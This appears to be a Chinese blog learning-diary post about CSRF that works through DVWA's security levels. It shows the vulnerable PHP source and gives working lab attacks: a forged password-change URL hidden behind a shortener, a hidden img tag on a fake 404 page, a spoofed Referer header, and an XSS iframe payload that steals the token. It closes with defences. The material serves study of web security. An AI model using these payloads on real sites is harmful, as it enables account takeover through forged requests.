Web安全 学习日记8 - CSRF(跨站请求伪造)

已于 2023-04-05 20:15:33 修改
阅读量266 收藏
点赞数
分类专栏: Web安全 文章标签: web安全 学习 csrf
于 2023-03-14 14:41:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/129481891
版权
文章详细介绍了CSRF(跨站请求伪造)攻击的概念、原理和不同安全等级下的实现方式,包括低级、中级和高级场景。同时,文章讨论了XSS的区别,并展示了如何利用CSRF漏洞修改用户密码。对于防御CSRF,文章提到了验证HTTPReferer字段和使用token的方法。最后,文章给出了基于token的身份验证流程。
摘要由CSDN通过智能技术生成

文章目录

CSRF概念

CSRF(Cross-Site Request Forgery)攻击中,黑客盗用了用户的身份,以用户的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了黑客所期望的一个操作,比如以用户的名义发送邮件、转账等。

CSRF原理和流程(注意区分XSS)

  • 用户浏览并登录受信网站A
  • 登录成功以后,受信网站A产生cookie并返回给浏览器
  • 用户在没有退出网站A的情况下访问恶意网站B
  • 恶意网站B要求访问受信网站A,发出一个请求
  • 浏览器会根据上述请求,带上用户的cookie访问受信网站A
  • 受信网站A会根据所带的cookie,以为是用户访问,故通过用户的请求,造成CSRF

在这里插入图片描述

DVWA CSRF

Low

1、查看源码

查看前端源码:发现是GET请求,有password_new和password_conf两个参数

<form action="#" method="GET">
			New password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_new"><br />
			Confirm new password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
			<br />
			<input type="submit" value="Change" name="Change">

		</form>

查看后端源码:接收并验证两个密码是否一致,若一致则更新密码。使用了mysql_real_escape_string转义特殊字符,可以防止一定程度的SQL注入,但也可以绕过。最重要的是没有对CSRF做任何防护,即没有验证token,也没有验证HTTP Referer字段。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

2、利用

方式1:让用户(admin)在没有登出的情况下,点击此URL,即可将密码修改成黑客想要的密码(ch4ser)

在这里插入图片描述

http://localhost/DVWA/vulnerabilities/csrf/?password_new=ch4ser&password_conf=ch4ser&Change=Change#

当然,用户通常不会点击一个很长的、看起来就不正常的链接,于是可以通过在线工具,将此链接生成为一个短链接
在这里插入图片描述

这里生成的短链接如下

https://s.r.sn.cn/iDMxfN

方式2:构造一个页面(csrf.html),将修改密码的链接重定向到一个自己写的一个错误页面,用户点击之后以为出错了,实际已经执行了恶意代码。

<img src="http://localhost/DVWA/vulnerabilities/csrf/?password_new=ch4ser&password_conf=ch4ser&Change=Change#" border="0" style="display:none;"/>
<h1>404</h1>
<h2>file not found.</h2>

在这里插入图片描述

Medium

1、查看源码

前端源码和Low级别一致

查看后端源码:使用了stripos()函数来验证 S E R V E R [ ′ S E R V E R N A M E ′ ] 是否出现在 _SERVER[ 'SERVER_NAME' ]是否出现在 SERVER[SERVERNAME]是否出现在_SERVER[ ‘HTTP_REFERER’ ]里面,即判断请求的来源是否为本站发出的,若是才进行密码修改的操作。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

2、利用
尝试直接在url栏输入

http://localhost/DVWA/vulnerabilities/csrf/?password_new=ch4ser&password_conf=ch4ser&Change=Change#

发现密码并未被修改,页面回显:That request didn’t look correct.
这是由于后端代码对HTTP Referer字段进行了判断,我们使用burpsuite进行抓包分析

正常的修改密码请求包内容如下:可见HOST是在Referer里面的,也就是请求是来自本站的
在这里插入图片描述

CSRF修改密码请求包内容如下:发现只有HOST字段,没有Referer字段,所以会造成密码修改不成功
在这里插入图片描述

绕过方法:对CSRF修改密码请求包添加一个Referer字段,然后发送该数据包,密码一样被修改

Referer: http://192.168.124.91/DVWA/vulnerabilities/csrf/

High

1、查看源码

查看前端源码:这次有了token值

<form action="#" method="GET">
			New password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_new"><br />
			Confirm new password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
			<br />
			<input type="submit" value="Change" name="Change">
			<input type='hidden' name='user_token' value='7307aeeda83356f27b6ec67bd82e1e55' />
		</form>

查看后端源码:使用了checkToken()函数验证客户端携带的token,验证成功才返回客户端请求的数据,可见防护措施做的很严密。

<?php

$change = false;
$request_type = "html";
$return_message = "Request Failed";

if ($_SERVER['REQUEST_METHOD'] == "POST" && array_key_exists ("CONTENT_TYPE", $_SERVER) && $_SERVER['CONTENT_TYPE'] == "application/json") {
    $data = json_decode(file_get_contents('php://input'), true);
    $request_type = "json";
    if (array_key_exists("HTTP_USER_TOKEN", $_SERVER) &&
        array_key_exists("password_new", $data) &&
        array_key_exists("password_conf", $data) &&
        array_key_exists("Change", $data)) {
        $token = $_SERVER['HTTP_USER_TOKEN'];
        $pass_new = $data["password_new"];
        $pass_conf = $data["password_conf"];
        $change = true;
    }
} else {
    if (array_key_exists("user_token", $_REQUEST) &&
        array_key_exists("password_new", $_REQUEST) &&
        array_key_exists("password_conf", $_REQUEST) &&
        array_key_exists("Change", $_REQUEST)) {
        $token = $_REQUEST["user_token"];
        $pass_new = $_REQUEST["password_new"];
        $pass_conf = $_REQUEST["password_conf"];
        $change = true;
    }
}

if ($change) {
    // Check Anti-CSRF token
    checkToken( $token, $_SESSION[ 'session_token' ], 'index.php' );

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = mysqli_real_escape_string ($GLOBALS["___mysqli_ston"], $pass_new);
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '" . $pass_new . "' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert );

        // Feedback for the user
        $return_message = "Password Changed.";
    }
    else {
        // Issue with passwords matching
        $return_message = "Passwords did not match.";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);

    if ($request_type == "json") {
        generateSessionToken();
        header ("Content-Type: application/json");
        print json_encode (array("Message" =>$return_message));
        exit;
    } else {
        echo "<pre>" . $return_message . "</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

2、利用
首先我们尝试了直接输入url和加上Referer,都不奏效。
于是用burpsuite进行抓包分析,发现其加上了token,不奏效的原因是token验证未通过。
在这里插入图片描述
搞清楚原因之后,我们就要想着如何获取token的值。
思路1:构造一个恶意页面,诱导用户访问,从而获取token值。(该方法行不通,因为浏览器不允许跨域访问)
思路2:利用XSS(以Reflected为例)漏洞(High级别),构造payload如下,然后弹出token值。

<iframe src="../csrf" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>

在这里插入图片描述

得到token值后,使用burpsuite抓包,将token加入到包中,同样成功修改密码。

192.168.124.91/DVWA/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change&user_token=d40b036b5abecc141b3f22b412bb829e#

Impossible

分析

查看前端源码:不仅有token值,还要求输入原密码

<form action="#" method="GET">
			Current password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_current"><br />
			New password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_new"><br />
			Confirm new password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
			<br />
			<input type="submit" value="Change" name="Change">
			<input type='hidden' name='user_token' value='8eef63fcf14e5f209b9aec9ba9f01b6e' />
		</form>

查看后端源码:同样验证了token值,不仅如此还要求用户输入原密码才能修改,防止了CSRF。使用了PDO预编译SQL语句,防止了SQL注入。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

CSRF防御

1、验证HTTP Referer字段
2、添加token并验证

基于token的身份验证方法

1.客户端使用用户名跟密码请求登录;
2.服务端收到请求,去验证用户名与密码;
3.验证成功后,服务端会签发一个 Token,再把这个 Token 发送给客户端;
4.客户端收到 Token以后可以把它存储起来,比如放在 Cookie 里或者 Local Storage 里;
5.客户端每次向服务端请求资源的时候需要带着服务端签发的;
6. 服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。

Ch4ser
关注
专栏目录
CSRF(跨站请求伪造)
谢公子的博客
09-23 2万+
目录 CSRF分类 GET型: POST型: CSRF攻击原理及过程: CSRF攻击实例: CSRF攻击的防御: (1)验证 HTTP Referer 字段 (2)在请求地址中添加 token 并验证(Anti-CSRFtoken) (3)在 HTTP 头中自定义属性并验证 CSRF漏洞的挖掘 使用BurpSuite快速生成C...
跨站请求伪造-CSRF防护方法
03-12
跨站请求伪造-CSRF防护方法跨站请求伪造-CSRF防护方法
跨站请求伪造CSRF
m0_60052233的博客
09-09 135
1跨站请求伪造概述 hacker ⽤户可以伪造admin ⽤户的转账请求,强制admin ⽤户,转账给任意⽤户 基本概念 跨站请求伪造(Cross Site Request Forgery,CSRF) 。 CSRF 是⼀种攻击,它强制终端⽤户在当前对其进⾏身份验证后的Web 应⽤程序上执⾏⾮本意操作的攻 击。 CSRF 攻击的重点在于更改状态的请求,⽽不是盗取数据,因为攻击者⽆法查看伪造请求的响应。 借助于社⼯的⼀...
跨站请求伪造CSRF
壮乡码农
12-07 2152
一、CSRF是什么? 通过浏览器冒充用户身份向服务器发送伪造请求并成功执行 二、攻击原理 1、用户正常登入受信任的网站A,输入账号密码登入 2、登入成功网站返回Cookie 3、用户未退出的网站,访问网站B 4、网站B接收到请求,返回恶意代码。并发出一个请求访问站点A 三、 CSRF的危害 CSRF工具特: 攻击时机: Cookie没有过期, 攻击前提: 了解网站接口 攻击难度:大于XSS 危害:修改密码、转账、删除数据 四、如何防护 1、referer校验 ...
CSRF-跨站请求伪造
TPH_BETTER.的博客
04-01 257
转自:https://blog.csdn.net/yun_ld/article/details/100048967 CSRF攻击全称为:Cross-site request forgery,直接翻译为:跨站请求伪造。直接看名称还是有点难以理解,容易跟XSS攻击搞混。在讲解如何防御之前,首先看看如何攻击,举个简单的攻击例子: 小明的悲惨遭遇 这一天,小明同学百无聊赖地刷着Gmail邮件。大部分都是没营养的通知、验证码、聊天记录之类。但有一封邮件引起了小明的注意:甩卖比特币,一个只要998!! 聪明的小明当然知
【DVWA系列】三、CSRF 跨站请求伪造源码分析&漏洞利用)
Pluto.的博客
03-12 578
文章目录DVWACSRF 跨站请求伪造一、low 级别二、medium 级别三、high 级别 DVWA CSRF 跨站请求伪造 一、low 级别 无安全防护措施,是判断两次输入的密码是否相同 随便修改一下,观察到修改密码值提交到了url中(get型): password_new=1&password_conf=1&Change=Change# 伪造一个网页,插入URL请求语句,修改密码为666,将它“修饰”一下: <html> <head> <t
使用django开发名为学习笔记的项目,完成网站成功实现了用户注册,用户登录功能,实现用户自己仅能访问自己创建的日记等等
02-13
9. **CSRF保护**:Django的CSRF跨站请求伪造)保护机制可以防止恶意第三方在用户浏览器中发起未经授权的操作。所有修改数据的表单都应包含CSRF令牌,以验证请求的来源合法性。 10. **部署与运维**:最后,项目...
图解HTTP十一:Web 的攻击技术
神薯片
06-15 2682
11.1 针对 Web 的攻击技术 11.1.1 HTTP 不具备必要的安全功能 从整体上看, HTTP 就是一个通用的单纯协议机制。因此它具备较多优势,但是在安全性方面则呈劣势。开发者需要自行设计并开发认证及会话管理功能来满足 Web 应用的安全。而自行设计就意味着会出现各种形形色色的实现。结果,安全等级并不完备,可仍在运作的 Web 应用背后却隐藏着各种容易被攻击者滥用的安全漏洞的 Bug。 11.1.2 在客户端即可篡改请求Web 应用中,从浏览器那接收到的 HTTP 请求的全部内容,都可以在客
渗透测试面试题--日更(1-9day)
IerkeU的博客
02-28 7954
day-one 1、拿到一个待检测的web站,渗透测试思路? 答: (1)信息收集 获取域名的whois信息,获取注册者的邮箱姓名电话等 查服务器的旁站以及子域名站点,因为主站一般比较难,所以可以先看看旁站有没有通用cms或者其他漏洞 查看服务器操作系统版本,web中间件,看看是否存在已知漏洞 查看IP,进行IP地址的全面扫描,对响应端口进行漏洞探测 (2)漏洞扫描:开始检测漏洞,例如XSS,XSRF,SQL注入,命令执行,越权访问,暴力破解… (3)漏洞利用:利益扫描到的漏洞拿到webshell或者其
基于PHP的eDiary php私密日记本.zip
07-18
开发者可能实施了各种安全措施,如SQL注入防护、XSS(跨站脚本攻击)预防、CSRF跨站请求伪造)令牌等。日记内容可能经过加密存储,以防止未授权访问。 **部署与服务器配置** 应用部署可能在本地服务器或云服务上...
csrf跨站请求伪造简单示例
10-18
一个简单的csrf跨站请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
CSRF---跨站请求伪造
monster0319的博客
03-09 940
攻击原理: 攻击者利用用户在浏览器中保存的认证信息,向对应的站点发送伪造请求。用户的认证是通过保存在cookie中的数据实现,在发送请求是,只要浏览器中保存了对应的cookie,服务器端就会认为用户已经处于登录状态。 攻击示例: 某个银行转账链接:http://localhost:22699/Home/Transfer;传的参数name="TargetUser"、name="Amount" 网站源码: <html> <head> <meta http-eq
CSRF跨站请求伪造
陌茗228.的博客
04-11 122
CSRF跨站请求伪造,利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 Low: 源代码: <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_
CSRF跨站请求伪造实战
帅醉了的博客
04-14 192
先是用目录扫描一顿扫,发现一个文件 打开看到是源码,里面还有修改密码的网页 并且发现没有限制referer和token 立马使用CSRF 提交 通过上面找到的后台路经尝试登陆 来到后台 ...
CSRF跨站请求伪造——原理及复现
qq_41679358的博客
08-11 3280
转自行云博客https://www.xy586.top/ 原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了.
CSRF漏洞原理与防御方式
dreamthe的博客
09-17 2065
CSRF漏洞原理 CSRF被叫做跨站请求伪造,该怎么理解这句话呢,比如 用户a在浏览器登录了账号,当他发送登录请求时候,服务器验证了账号密码,会返回给一个身份信息存放在cookie里面,浏览器保存,那么以后用户访问服务器带着这个cookie就行了。那么怎么产生攻击的呢,是用户在已经登录的状态下,访问了一个恶意的网站,带浏览器保存的cookie值向服务器发送了恶意请求,服务器会以为是用户的请求,其实这是用户不知情的请求。垮了两个站,一个是用户登录实际网站,一个屙屎攻击者恶意构造网站,所以称作跨站请求伪造
CSRF攻击原理及防御和相关漏洞复现
qq_43710889的博客
08-08 1871
CSRF攻击原理及防御和相关漏洞复现 CSRF(Cross-site request forgery)跨站请求伪造,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 CSRF攻击原理及过程: 过程 1.用户打开浏览器,访问受信任银行网站,输入用户名密码请求登陆网站 2.在
CSRF跨站请求伪造漏洞
最新发布
12-06
CSRF(Cross-site request forgery)跨站请求伪造是一种网络攻击方式,攻击者通过伪造用户请求来冒充用户身份,从而进行一些非法操作。攻击者通常会在第三方网站上设置陷阱,引诱用户点击链接或者访问页面,从而触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值